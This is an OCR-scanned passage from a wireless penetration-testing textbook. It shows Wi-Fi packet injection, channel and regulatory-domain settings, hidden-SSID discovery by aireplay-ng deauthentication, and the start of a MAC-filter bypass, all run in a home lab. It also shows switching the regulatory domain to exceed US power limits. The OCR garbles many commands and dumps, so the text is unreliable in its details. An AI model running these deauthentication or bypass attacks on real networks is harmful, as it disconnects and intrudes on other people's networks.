Source address: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
0000 00 OO 20 OO 2f 48 OO OO 25 b8 fa 37 O1 OO OO OO 
0010 10 02 9e O9 aO OO cf Ol OO OO OO OO OO OO OO OO 


0020 50 00 OO OO OO 87 e5 3a Ob f8 OO 21 91 d2 Se 25 
0030 00 21 91 d2 8e 25 40 ac 61 d5 fd Se 02 00 00 00 


mono: «live capture in progress» Fi... : : i ; : :| Profile: Default 











* 15990 AV; 
We just successfully injected packets into our test lab network using ai repl ay- ng. Itis 


important to note that our card injected these arbitrary packets into the network without 
actually being connected to the access point Wi rel ess Lab. 
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Have a go hero — installing BackTrack on Virtual Box 


We will look at packet injection in greater detail in later chapters; however, feel free to 
explore other options of the ai rep! ay- ng tool to inject packets. You can verify that 
injection succeeded by using Wireshark to monitor the air. 


Important note on WLAN sniffing and injection 


WLANs typically operate within three different frequency ranges—2.4 GHz, 3.6 GHz, and 
4.9/5.0 GHz. Not all Wi-Fi cards support all these ranges and associated bands. As an 
example, the Alfa card, which we are using, only supports IEEE 802.11b/g. This would mean 
this card cannot operate in 802.11a/n. The key point here is that to sniff or inject packets in a 
particular band, your Wi-Fi card will need to support it. 


Another interesting aspect of Wi-Fi is that in each of these bands, there are multiple 
channels. It is important to note that your Wi-Fi card can only be on one channel at any given 
moment. It is not possible to tune into multiple channels at the same time. The analogy I can 
give you is your car radio. You can tune it to only one of the available channels at any given 
time. If you want to hear something else, you will have to change the channel of the radio. 
The same principle applies to WLAN sniffing. This brings us to an important conclusion— we 
cannot sniff all channels at the same time, we will need to select which channel is of interest 
to us. What this means is, that if our access point of interest is on channel 1, we will need to 
set our card on channel 1. 


Though we have addressed WLAN sniffing in the previous paragraphs, the same applies to 
injection as well. To inject packets on a specific channel, we will need to put the card radio 
on that channel. 


Let's now do some exercises on setting our card to specific channels, channel hopping, 
setting regulatory domains, power levels, and so on. 





Time for action — experimenting with your Alfa card 


Follow the instructions carefully: 


1. Enterthei wconfig wl an0 command to check the capabilities of your card. As you 
can see in the following screenshot, the Alfa card can operate in the b and g bands: 
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root@bt: ~ - Shell - Konsole 
on Edit View Bookmarks Settings Help 





rootebt:-# iwconfig wlanO 


wlanO iaa: NER ESSID:off/any 
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm 


Retry long limit:7 RTS thr:off Fragment thr:off 


Encryption key:off 
Power Management: off 


root@bt:-~# 
root@bt:-~# 
root@bt:~# 
root@bt:-~# 





2. Just for demo purposes, when I connect another card, a D-Link DWA-125, we see 
that it is capable for b, g, and n bands: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# iwconfig wlanO 

wlan ESSID: of f /any 
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: on 


root@bt :~# 
root@bt:-# 





3. To set the card on a particular channel we use thei wconfig mon0 channel X 
commands: 


g root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





rootabt:-# iwconfig monO channel 11 

root@bt:~# 

root@bt:-# iwconfig monO 

mono IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm 


Retry long limit:7 RTS thr:off Fragment thr:off 
Power Management: off 


root@bt :~# 
root@bt:~# 
root@bt:~# J 
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4. Thei wconfig series of commands does not have a channel hopping mode. 
One could write a simple script over it to make it do so. An easier way is to use 
airodump- ng with options to either hop channels arbitrarily or only a subset or 
only selected bands. All these options are illustrated in the following screenshot 
when werunairodump-ng -help: 


root@bt: ~ - Shell - Konsole 


: Hides known stations for --showack 
<msecs> : Time in ms between hopping channels 
- -berlin «secs» : Time before removing the AP/client 
from the screen when no more packets 
are received (Default: 120 seconds) 
-r «file» : Read packets from that file 
-X «msecs» : Active Scanning Simulation 
- -output-format 
«formats» : Output format. Possible values: 
pcap, ivs, csv, gps, kismet, netxml 


Filter options: 
--encrypt | «suite» : Filter APs by cipher suite 
--netmask «netmask» : Filter APs by mask 


- -bssid «bssid» : Filter APs by BSSID 
-a : Filter unassociated clients 


By default, airodump-ng hop on 2.4GHz channels. 
You can make it capture on other/specific channel(s) by using: 
--channel <channels>: Capture on specific channels 
--band <abg> : Band on which airodump-ng should hop 
-C <frequencies> : Uses these frequencies in MHz to hop 
--cswitch <method> : Set channel switching method 
: FIFO (default) 
: Round Robin 
: Hop on Last 
: Same as --cswitch 


: Displays this usage screen 
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We understood that both wireless sniffing and packet injection depend on the hardware 
support available. This would mean that we can only operate on bands and channels allowed 
by our card. Also, the wireless card radio can only be on one channel at a time. This would 
further mean that we can only sniff or inject in one channel at a time. 


If you would like to simultaneously sniff on multiple channels, you would require multiple 
physical Wi-Fi cards. If you can procure additional cards, then you can try to sniff on multiple 
channels simultaneously. 
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Role of regulatory domains in wireless 


The complexities of Wi-Fi don't end here. Every country has its own unlicensed spectrum 
allocation policy. This specifically dictates allowed power levels and allowed users for the 
spectrum. In the US, for example, the FCC decides this and if you use WLANs in the US you 
have to abide by these regulations. In some countries, not doing so is a punishable offense. 


Now let us look at how we can find the default regulatory settings and then how to change 
them if required. 





Time for action — experimenting with your Alfa card 


Perform the following steps: 


1. Reboot your computer and do not connect your Alfa card to it yet. 
2. Once logged in, monitor the kernel messages using the t ai | command: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# tail -f -n 0 /var/log/messages 





3. Insert the Alfa card, you should see something which resembles the following 
screenshot. This is the default regulatory settings applied to your card: 


root@bt: ~ - Shell - Konsole 


rootabt:-# tail -f -n 0 /var/log/messages 


Jun :35: kernel: usb 1-2: new full speed USB device using ohci hcd and address 3 
kernel: cfg80211: Calling CRDA to update world regulatory domain 
kernel: cfg80211: World regulatory domain updated: 
kernel: (start freq - end freq @ bandwidth), (max antenna gain, max eirp) 
kernel: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, mBm) 


kernel: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, mBm) 
kernel: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, mBm) 
kernel: (5170000 KHz - 5250000 KHz (à 40000 KHz), (300 mBi, mBm) 
kernel: (5735000 KHz - 5835000 KHz (à 40000 KHz), (300 mBi, mBm) 
kernel: phy0: hwaddr 00:c0:ca:3e:bd:93, RTL8187vB (default) V1 + rtl8225z2, rfkill 


kernel: rtl8187: Customer ID is OxFF 
kernel: rtl8187: wireless switch is on 
kernel: usbcore: registered new interface driver rtl18187 
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4. Let's assume that you are based in the US. To change your regulatory domain to the 
US, we issue the commandiw reg set US in a new terminal: 


- o) 


Session Edit 


root@bt: ~ - Shell No. 2 - Konsole 


View Bookmarks Settings Help 





root@bt:-~# iw reg set US 


root@bt :~# 
root@bt:~# 


rootebt:~# B 





5. Ifthe command is successful, we get an output as shown (in the following 
screenshot) in the terminal where we are monitoring /var/log/messages: 


kernel: cfg80211: Calling CRDA for country: US 

kernel: cfg80211: Regulatory domain changed to country: US 

kernel: (start freq - end freq @ bandwidth), (max antenna gain, max eirp) 
kernel: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm) 
kernel: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm) 
kernel: (5250000 KHz - 5330000 KHz (à 40000 KHz), (300 mBi, 2000 mBm) 
kernel: (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) 
kernel: (5735000 KHz - 5835000 KHz ( 40000 KHz), (300 mBi, 3000 mBm) 





6. Now try, changing the card to channel 11, it would work. But when you try changing 
it to channel 12, you get an error. This is because channel 12 is not allowed for use in 


the US: 


root@bt: ~ - Shell No. 2 - Konsole 


Session Edit View Bookmarks Settings Help 


root@bt :~# iwconfig wlanO channel 11 


root(bt :~# 
root@bt :~# 


rootabt:~# iwconfig wlan 


wlanO 


root@bt :~# 
root@bt :~# 


IEEE 802.11bg ESSID:off/any 

Mode:Managed Frequency:2.462 GHz Access Point: Not-Associated 
Tx-Power=27 dBm 

Retry long limit:7 RTS thr:off Fragment thr:off 

Encryption key:off 

Power Management: off 


rootabt:~—# iwconfig wlanO channel 12 
Error for wireless request "Set Frequency" (8B04) : 
SET failed on device wlanO ; Invalid argument. 


root(bt :~# 


root@bt:~# iwconfig wland 


wlanO 


IEEE 802.11bg ESSID:off/any 

Mode:Managed Frequency:2.462 GHz Access Point: Not-Associated 
Tx-Power-27 dBm 

Retry long limit:7 RTS thr:off Fragment thr:off 

Encryption key:off 

Power Management: off 


rootebt:-# l 
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7. The same applies for power levels. The US only allows a maximum of 27dBm (500 
milliwatts), so even though the Alfa card has an advertised power of 1 Watt (30 
dBm), we cannot set the card to maximum transmit power: 


root@bt: = - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 


rootcbt:-# iwconfig wlan8 txpower 27 
root(bt :-# 
rootüabt:-3 
rootebt:-# iwconfig wlanO txpower 30 


Error for wireless request "Set Tx Power" (8B26) : 
SET failed on device wlan ; Invalid argument. 

root@bt:-# 

rootüabt :-3 

root@bt :-# 

rootabt:-# Jj 





8. However, if we were in Bolivia, then we could transmit at a power of 1 Watt, as 
this is allowed there. As we can see, once we set the regulatory domain to the 
Bolivia—i w reg set BO, wecan change the card power to 30DMB or 1 Watt. 
We can also use channel 12 in Bolivia, which was disallowed in the US: 


root@bt: ~ - Shell No. 2 - Konsole 





iw reg set BO 
iwconfig wlanO txpower 30 


~# 
~# 
~# 
~# 
DE 
~# 
~# iwconfig wlanO channel 12 
~# 

~# 

~# 


:~# iwconfig wlanO 
IEEE 802.11bg ESSID:off/any 
Mode:Managed Frequency:2.467 GHz Access Point: Not-Associated 
Tx-Power=30 dBm 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: off 


root@bt:~# 
rootebt:~# B 
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Every country has its own regulations for the use of the unlicensed wireless band. When we 
set our regulatory domain to a specific country, our card will obey the allowed channels and 
power levels specified. However, it is easy to change the regulatory domain of the card and 
force it to work on disallowed channels and to transmit at more than allowed power. 


Look at the various parameters you can set such as channel, power, regulatory domains, 

and so on. Using the i w series of commands on BackTrack. This should give you a firm 
understanding of how to configure your card when you are in different countries and need to 
change your card settings. 









1. Which frame types are responsible for authentication in WLANs? 


a. Control 

b. Management 
c. Data 

d. QoS 


2. Whatis the name of the second monitor mode interface which can be created on 
wl an0 using ai r mon- ng? 


a. Mon 
b. Monl 
c. I1Mon 
d. Monb 


3. Whatisthe filter expression to view all non-beacon frames in Wireshark? 
a. l(wlan.fc.type subtype == 0x08) 
b. wlan.fc.type subtype == 0x08 
c. (no beacon) 
d. Wian.fc.type == 0x08 
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In this chapter, we have made some key observations about WLAN protocols: 


Management, Control, and Data frames are unencrypted and thus can be easily read by 
someone who is monitoring the air space. It is important to note here that the data packet 
payload can be protected using encryption to keep it confidential. We will talk about this in 
the next chapter. 


We can sniff the entire airspace in our vicinity by putting our card into monitor mode. 


As there is no integrity protection in Management and Control frames, it is very easy to inject 
these packets by modifying them or replaying them as is using tools such as al repl ay- ng. 


Unencrypted data packets can also be modified and replayed back to the network. If the 
packet is encrypted, we can still replay the packet as-is, as WLAN by design does not have 
packet replay protection. 


In the next chapter, we will look at different authentication mechanisms which are used in 
WLANs such as MAC Filtering, Shared Authentication, and so on, and understand the various 
security flaws in them through live demonstrations. 


MEE 
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N "A false sense of security is worse than being unsure." 


m 
Anonymous 
A false sense of security is worse than being insecure, as you may 


not be prepared to face the eventuality of being hacked. 


WLANs have weak authentication schemas, which can be easily broken and bypassed. In this 
chapter, we will look at the various authentication schemas used in WLANs and learn how to 
beat them. 


In this chapter, we will look at the following: 


Uncovering hidden SSIDs 
Beating MAC filters 
Bypassing Open Authentication 
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Bypassing Shared Key Authentication 


In the default configuration mode, all access points send out their SSIDs in the Beacon 
frames. This allows clients in the vicinity to discover them easily. 


Unfortunately, this measure does not provide robust security, but most network 
administrators think it does. We will now look at how to uncover hidden SSIDs. 






Bypassing WLAN Authentication 


Time for action — uncovering hidden SSIDs 


Follow these instructions to get started: 





1. Using Wireshark, if we monitor the Beacon frames of the Wi rel ess Lab network, 
we are able to see the SSID in plain text. You should see Beacon frames as shown in 
the following screenshot: 


mono: Capturing - Wireshark 


File Edit View Go Capture Analyze Statistics Help 


Ax? 8&8 


fv] riter: fwlan.addr == 00:21:91:d2:8e:25 v] +} Expression 


6, 00000 D-Link d2:8 Broadcast IEEE 802 C frame, SN=2399, FN=0 81=100 - Wireless Lab" 
3.060971 D-Link d2:80: Broadcast IEEE 802 Beac frame, SN=2400, FN=0, as C, BI=100, Lab" 
0.188981 D-Link_d2:8e: Broadcast IEEE 802 Bee | frame, SN-2401, FN=0, ags C, BI=100, | Lab" 
0.265811 D-Link_d2:8e: Broadcast IEEE 802 Beac frame, SN=2402, FN-0, "lags C, BI=100, s Lab" 
). 382718 D-Link d2: Broadcast IEEE 802 Beacon frame, SN=2403, FN=0, ags C, BI=100, Lab" 
0.468781 D-Link d2:8e: Broadcast IEEE 802 Beacon frame, SN-2404, FN=0, ags- BI-100, ; Lab" 
D 
D 
D 
D 
D 
D 


» uo pa 
Uu up 


un un om 
ted ed ee ed ed ed ed et et ed uos 


in 
ui 


(D Uu. 


3.574691 Link d2: e Broadcast IEEE 802 Beac frame, SN-2405, FN=0, £ ( BI=100, Lab" 
j 0.691762 -Link_d2:8e Broadcast IEEE 802 Beac frame, SN=2406, FN=0, ags BI=100, Lab" 

0.777055 -Link_d2:8 Broadcast IEEE 802 Beac« frame, SN=2407, FN=0, - C, BI=100, Lab" 
> 0.904841 -Link_d2: Broadcast IEEE 802 B ( frame, SN-2408, FN=0, Flags BI-100, Lab" 
. 982922 -Link_d2:8e: Broadcast IEEE 802 Beacon frame, SN=2410, FN=0, Flags C, BIz100, less Lab" 
199059 )-Link_d2: Broadcast IEEE 802 Beacon frame, SN=2411, FN=0, C C, BI=100, ; Lab" 
.315985 D-Link d2: Broadcast IEEE 802 Beacon frame, SN-2412, FN=0, Flags C, BI=100, ess Lab" 


Uu utu utu 


un in UI U 


NNNNNNNNNNNN N 
Un un cn 
unu u tu tutu tnu 








Un un un 
uuu un 
utu 


> Frame (251 bytes on wire, 251 bytes captured) 
> Radiotap Header vO, Length 32 
^ IEEE 802.11 Beacon frame, Flags: 
~ IEEE 802.11 wireless LAN management frame 
b Fixed parameters (12 bytes) 
" Tagged parameters (179 bytes) 
" SSID parameter set: "Wireless Lab" 
Tag Number: © (SSID parameter set) 
Tag length: 12 
Tag interpretation: Wireless Lab 
" Supported Rates: 1.0(B) 2.0(B) 5.5(B) 
Tag Number: 1 (Supported Rates) 
Tag length: 4 
Tag interpretation: Supported rates: 1.0(B) 2.0(B) 5.5(B) 11.0(B) [Mbit/sec] 
" DS Parameter set: Current Channel: 11 


0000 00 00 20 00O 2f 48 OO DO Of 8d 12 
0010 10 02 Se 09 a8 OO fb O1 00 OO OO 00 O 
0020 80 00 0O OO ff ff ff ff ff ff OO 
0039 00 21 91 d? Re 25 fO 95 80 el ab 


mono: «live capture in progress Fi.. , [Packets: 526 Displayed: 274 gom 0 : Profile: Default 





2. Configure your access point to set the Wireless Lab network as a hidden SSID. The 
actual configuration option to do this may differ across access points. In my case, | 
need to check the Invisible option in the Visibility Status option as shown next: 


COE 


(i?) per: fwlan.adde == 00:21 


> Frane 4 


Product Page: DIR-615 


SETUP ADVANCED TOOLS STATUS 


INTERNET 


WIRELESS SETTINGS 


NETWORK SETTINGS 





Save Settings Don't Save Settings 


WIRELESS NETWORK SETTINGS 


Use this section to configure the wireless settings for your D-Link Router. Please note that 
changes made on this section may also need to be duplicated on your Wireless Client. 


Enable Wireless : Always ~ 


Wireless Network Name : Wireless Lab 
802.11 Mode : 


Enable Auto Channel Scan : | | 


Wireless Channel : 


Transmission Rate : 


Best (automatic) 


2.462GHz -CH 11 v 


~ (Mbit/s) 


Channel Width: 20 MHz v 


Visibility Status: € 


WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 
require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: None 


WIRELESS 


Visible 9^ Invisible 


Hardware Version: B2 


(Also called the SSID) 
Mixed 802.11n, 802.11g and 802.11b w 


Firmware Version: 2.23 


SUPPORT 


Helpful Hints... 


Changing your Wireless 
Network Name is the first 
step in securing your 
wireless network. Change 
it to a familiar name that 
does not contain any 
personal information. 


Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your w SS 
network to operate on. 


Enabling Hidden Mode is 
another way to secure 
your network. With this 
option enabled, no w 
dient 


le. For your 
s to connect 


urity, make 
sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on a 
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Now if you look at the Wireshark trace, you will find that the SSID Wireless Lab has 
disappeared from the Beacon frames. This is what hidden SSIDs are all about: 


wh 
- I 


ET (D Oo o - 


oOoocoooo 
i» 
"4 € Oe Gu 0 wo 


-J C ut 


© 
J 


© 


. 993457 
. 194869 
- 296837? 


. 413898 


a^ -— et owt (ID 


mEXCZ 
191:d2:86:25 


D 

D-Link d2:8e:25 
D-Link d2:8e: 
D-Link d2:8e:25 
D-Link d2:8e:25 
D-Link d2:8e:25 
D-Link d2:8e:25 
D-Link d2:8e:2 
D-Link d2:8e:2 
D-Link d2:8e:25 
D-Link d2:8e:25 
D-Link d2:8e:2 


a wwT XE E 


Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Brosdcast 


(239 bytes on wire, 239 bytes captured) 


» Rediotep Header v8, Length 32 

» IEEE 802.11 Beacon frone, Flags: 

* IEEE 802.11 wireless LAN manageaent frase 
* Fixed paraneters (12 bytes) 
+ Tagged parameters (167 bytes) 


+ SSID parameter set: 


Broadcast 


Tag Number: 0 (SSID parameter set) 


Tag length: 8 


, 


59 interpretatiot 


* Supported Rates: 1 


Tag Number: 1 (& 


Tag length: 4 


.8(B) 2.89(B) 5.5(R) 
apported Rates) 


Tag interpretation: Supported rates: 


v DS Parameter set: 


Current Channel: 11 


00 O0 20 00 2f 48 00 OO 24 4b a2 38 0] GO 00 Q 
16 02 9e O9 a8 OO f7 01 86 OO 00 OO 00 OO 00 GO 
Bo 00 00 GO ff ff ff ff ff ff 86 21 91 d? Be 
ha30 AA 21 91 d? Re 2*5 en 44 AR B! 3h 46 AI AA nn 
interpretation of tag (Wlan, mgt tag 


Packets: 1844 Displayed: 560 Marked: O 


mond: Capturing - Wireshark 


fle Edt Yew Go Capture Analyze Statistics Help 


Saag @USe B 
vw | & Expression Å Clear 


IEEE 
IEEE 
IEEE 
IEEE 
IEEE 
IEEE 
IEEE 
IEEE 

IEEE 
IEEE 
[EEE 

IEEE 


Beacon fros Nell62, FNe®, Flo 


662 Beacon frame, 5N-1103, 
862 Beacon frame, SN=1164, 
802 Beacon frase, SN=1105, 
662 Beacon frame, SN-1106, 
8802 Beacon frame, SN=1107, 
862 Beacon freae, SN=1108, 
882 Beacon frame, SN-1109, 
802 Beacon frame, SN«1110, 
802 Beacon frase, SN«1111, 
802 Beacon frame, 5N-1112, 
862 Beacon frase, SN=1113, 
B82 Beacon frame, SN=1114, 


[Mbit/sec] 


1S , 8l=100, SSII 


FN«O, Flagse,....... C, 


e 


odo 
>, 


o 
* 


$ed pe pud ae tnt 


25oooo 
ooo 


U t^ y t^ u^ uu 


h 


hn ai 


{ 


SIDsBroedcast 
SIDsBroadcast 
SIDsBroadcast 
iSID«Broedcast 
3S 1D=Broadcast 
SSIDsBrosdcast 
SIDsBroeadcast 
SID»Broadcast 
IOsBroadcast 
ID»Broadcast 
SIDsBroadcast 
SSIDsBroadcast 


Bl=108, SSIDsBroadcast 
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4. in order to bypass them, first we will use the passive technique of waiting for a 
legitimate client to connect the access point. This will generate Probe Request and 
Probe Response packets which will contain the SSID of the network, thus revealing 
its presence: 


mond: Capturing - Wireshark 
fin Edt View Go Capture Analyze Statistics Hep 


Bana saxa Lees 9FZEE AAG BUSH GB 
[v piter: [wlan addr 2x 50:fb:42:05:e4:01 | > Expression...) dh Clear | «f anply 


mec ee [eem domm om LRL 


24 B5 233H. EL Bo; fora: S dou al dE IEEE H92 Probe Hequest, 2N-20025, FN- É Flagss......s C, seis" eo Ce Eee Lab" 

Gh 7338. 44696 D-Link dz: 25 BB:Tb:42:d5:ed:B IEEE 822 Probe Response, SNszU561, FNs8; Fl&g&s......;.E, BIsIB8B8, S5S5IDz^"Wirmless L 
54053 233B. 602154 BS; Tb:42: T y al D-Link d2:8e:25 IEEE 802 Authentication, 5N-2865, Fic. Flagi, setae C 

24095 ;33B.5B4BB9 D-Link drse:z5 BB:ib:dg:d5:ed:B91 [EEE Boy Authentication, SN=s964d, FNzH, Flagez........ c 

240898 25358 052904 nd:fb:á4z2:do:ed:ü]l D-Link dolBe:45 IEEE 882 Association Request, SNez067, FMsO, Flagss........C, $ e"Wireless Lab’ 
54180 7330.655635 D-Link d2:8e:25 B&B: Thr dA2:d5:e4:0] IEEE 882 Association Response, SN=2966, FN=0, Flagss C 

54l]8! £358. 6 19656 Eg:Tb:4z:05:e4:0] D-Link dguz:B8e:25 IEEE B02 Prope Request, SN-zB6B, FN-D, Flagsz.......,.L, IUz"Wireless Lan" 

54199 2336.821855 D-Link d2:8e:25 p: tE: 42rd 04r E] IEEE B92 Probe Hesponse, 5N-2969, FNz 8, Flagsz..... sets "Bl ee selD="Wireleas L 
34485 2346.638165 58:fb:42:d5:e4:81 D-Link d2:8e:25 IEEE Biz Qos Mull function (No data), SNeG, n. B, Flágss. seed 


t Frame 54086 (369 bytes on wire, 369 bytes captured) 
t Radiotap Header vo, Length 32 
t IEEE 802.11 Probe Response, Flagge: .......- C 
~ [EEE 802.11 wireless LAN management frame 
t Fixed paraneters (12 bytes) 
v Tagged parameters (297 bytes] 
+ S510 parameter set: "Wireless Lab" 
Tag Number; © (S810 parameter set? 
Tag length: 12 
g interpretation: Wireless Lab 
kt Supparted Rates: 1.0£B) Z.O0[B) 3.506) 11.8(B) 
t 05 Parameter set: Current Channel: 11 
t ERP Information: mo Mon-ERP STAs, do not use protection, short or long preambles 
k Extended Supported Rates: 56.0 9.6 12.0 18.0 74.8 34,6 48.8 54.6 
Vendor Specific: WME 
Vendor Specific: HT Canabllities (8b2.11n 01.16) 
Vendor Specific: HT Additional Capabilities [B882.11n 01.06) 
EHT 5Ganablliries fa2.11n ELE ed 
D GA DB 21 8&4 80 8c S , j 20 4. 
BEDE 0l 04 82 84 Bb 36 83 61 Gb 24 61 00 32 08  ER...... ...*..2. 
Be 17 18 24 30 4H 60 6c dd 18 Gd 50 fZ G2 dl dl eee 0H Y LLL Pu. 
T£ DA PA D Ad BC] dC] 77 as ë DA BE 47 dd 5e HB) "^ T7 i. Hi 


Interpretation al tag [wian mgt.tag.... Packets: 70250 Displayed: 217 Marked: 0 ) Profle: Diatault 





5. Alternatively, you can use ai rep! ay- ng to send Deauthentication packets to 
all stations on behalf of the Wi rel ess Lab access point by typing ai repl ay- 
ng -0 5 -a 00:21:91: D2:8E: 25 mond. The- 0 option is for choosing a 
Deauthentication attack, and 5 is the number of Deauthentication packets to send. 
Finally, - a specifies the MAC address of the access point you are targeting: 


ó root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


roote@bt:-# aireplay-ng -0 5 -a 00:21:91:D2:8E:25 mond 

07:56:47 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 
NB: this attack is more effective when targeting 

a connected wireless client (-c <client's mac>). 





07:56:48 Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25] 
07:57:19 Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25] 
07:57:50 Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25] 
07:58:22 Sending DeAuth to broadcast BSSID: [00:21:91:D2:8E:25] 
07:58:53 Sending DeAuth to broadcast BSSID: [00:21:91:D2:8E:25] 
rootebt:-# B 
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6. The preceding Deauthentication packets will force all legitimate clients to disconnect 
and reconnect. It would be a good idea to add a filter for Deauthentication packets 
to view them in an isolate way: 


mono: Capturing - Wireshark 


File Edit View Go Capture Analyze Statistics Help 


Bag e saxeSir._esvsnF LPS «aer EEE 


—- fc.type subtype -- OxOc dl dP Expression.. E Clear| S Apply| 


"230 14. 762645 -Link d2:8 Broadcast IEEE 802 Deauthentication, 
231 14.762658 "Link d2:86 : Broadcast 802 Deauthentication, 
236 15.000852 -Link_d2:8e: Broadcast 802 Deauthent ication, 
237 15.000864 -Link_d2:8e: Broadcast 802 Deauthentication, 
243 15.238118 -Link_d2:8e: Broadcast 802 Deauthentication, 
245 15.238134 -Link_d2:8e: Broadcast 802 Deauthentication, 
249 15.478635 -Link_d2:8e: Broadcast 802 Deauthentication, 
250 15.478697 -Link_d2:8e: Broadcast 802 Deauthentication, 
299 I5. 717156 -Link d2:8e: Broadcast 802 Deauthentication, 





DUoUUUuUUUIL 

















b Frame 230 (38 bytes on wire, 38 bytes captured) 

^ Radiotap Header vO, Length 12 

v IEEE 802.11 Deauthentication, Flags: 
Type/Subtype: Deauthentication (OxOc) 
Frame Control: 0x00CO (Normal) 
Duration: 314 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source address: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
BSS Id: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
Fragment number: 0 
Sequence number: 0 

> IEEE 802.11 wireless LAN management frame 


0000 00 00 Oc 00 04 80 00 OO 202 00 18 00 cO 00 3a 01 
0010 ff ff ff ff ff ff OO 21 91 d2 Be 25 002191 d2 
0020 8e 25 00 00 07 00 


mono: «live capture in progress? Fi... 1 Packets: 1525 Displayed: 417 Marked: 0 :| Profile: Default 





7. The Probe Responses from the access point will end up revealing its hidden SSID. 
These packets will show up on Wireshark as shown next. Once the legitimate clients 
connect back, we can see the Hidden SSID using the Probe Request and Probe 
Response frames. You could use the filter (wlan.bssid == 00:21:91:d2:8e:25) && 
l(wlan.fc.type subtype == 0x08) to monitor all non-Beacon packets to and fro from 
the access point. The && sign stands for the logical AND operator and the ! sign 
stands for the logical NOT operator: 


KH 
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(Untitted) - Wireshark 


Ele Edt View Go Capture Analyze Statisnes Hep 








row Soars em) 
E 802 Probe Response, SNe3545, FNeO, Flagse........C, Bl=100, SSiDe"Wireless Lab” 


EEE 802 Authentication, SN=2114, FN=0, F 
E 802 Authentication, SN-2114, FN-0, F 





IEEE 802 Authentication, SN=3548, FN-0, g 
D-Link d2:8e:25 IEEE 802 Association Request, SN=27115, FNsB, Flagss........C, SSIDs"Wireless Lab" 
60:fD:42:05:04:81 IEEE 802 Association Response, SN=3549, FNzO, Flags= C 
D-Link d2:8e:25 IEEE 802 Probe Request, SNz2116, FN=0, Flagss........C, SSIDs"Wireless Lab' 
60: fb:42:45:04:81 D-1 ink_d2:8e:25 IEEE 802 Probe Request, SN-2116, FN=0, Flagss....R...C, SSID«s"Wireless Lab’ 
D-Link d2:8e:22 60: fb:42:d5:¢e4:01 IEEE 802 Probe Response, SN=3551, FN=0, Flags= C, B1«109, SS10="Wireless Lab" 


> Frane 544 (369 bytes on wire, 369 bytes captured) 
> Radiotap Header vO, Length 32 
* IEEE 892.11 Probe Response, Flags: ........ C 
v IEEE 802.11 wireless LAN management frane 
* Fixed parameters (12 bytes) 


* SSID parameter set: "Wireless Lab" 
Tag Number: © (SSID parameter set] 
Tag length: 12 
Tag interpretation: Wireless Lab 
b Supported Rates: 1.0(B) 2.6(8) 5.5(8) 11.8(B) 
> DS Parameter set: Current Channel: 11 
b ERP Information: no Non-ERP STAS, do not use protection, short or long preanbles 
» Extended Supported Rates: 6,0 9,0 12.0 18.0 24,0 36.8 48.0 54.0 
b Vendor Specific: WME 
>’ Vendor Specific: HT Capabilities (5B87.11n D1.18) 
|.48 64 80 21 04 80 Oc EREMO ELE 
01 O4 82 84 Bb 96 683 0] Gb 2a 01 BO 32 6f 
960 Oc 12 18 24 30 48 80 6c dd 18 69 50 f2 82 0 
3478 OR RE GR a4 AO OB 27 a4 A OB £42 43 Se Ai } : 
Interpretation of tag (Wlan. mgt tag... 3 4 Profile: Defaut 





X 520 A 
Even though the SSID is hidden and not broadcast, whenever a legitimate client tries to 
connect to the access point, they exchange Probe Request and Probe Response packets. 
These packets contain the SSID of the access point. As these packets are not encrypted, they 
can be very easily sniffed from the air and the SSID can be found. 





In many cases, all clients may be already connected to the access point and there may be 
no Probe Request/Response packets available in the Wireshark trace. Here, we can forcibly 
disconnect the clients from the access point by sending forged Deauthentication packets 
on the air. These packets will force the clients to reconnect back to the access point, thus 
revealing the SSID. 


Have a go hero — selecting Deauthentication 


In the previous exercise, we sent broadcast Deauthentication packets to force reconnection 
of all wireless clients. Try and check how you can selectively target individual clients using 
alreplay-ng. 


It is important to note that even though we are illustrating many of these concepts using 
Wireshark, it is possible to orchestrate these attacks with other tools like ai rcrack-ng 
suite as well. We will encourage you to explore the entire al rcrack- ng suite of tools and 
other documentation located on their website: http://www. ai rcrack- ng. org. 
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MAC filters are an age old technique used for authentication and authorization and have 
their roots in the wired world. Unfortunately, they fail miserably in the wireless world. 


The basic idea is to authenticate based on the MAC address of the client. This list of allowed 
MAC addresses will be maintained by the network administrator and will be fed into the 
access point. We will know look at how easy it is to bypass MAC filters. 


Time for action — beating MAC filters 


Let the games begin: 





1. Let us first configure our access point to use MAC filtering and then add the client 
MAC address of the victim laptop. The settings pages on my router look as follows: 


Product Page: DIR-615 Hardware Version: B2 Firmware Version: 2.23 


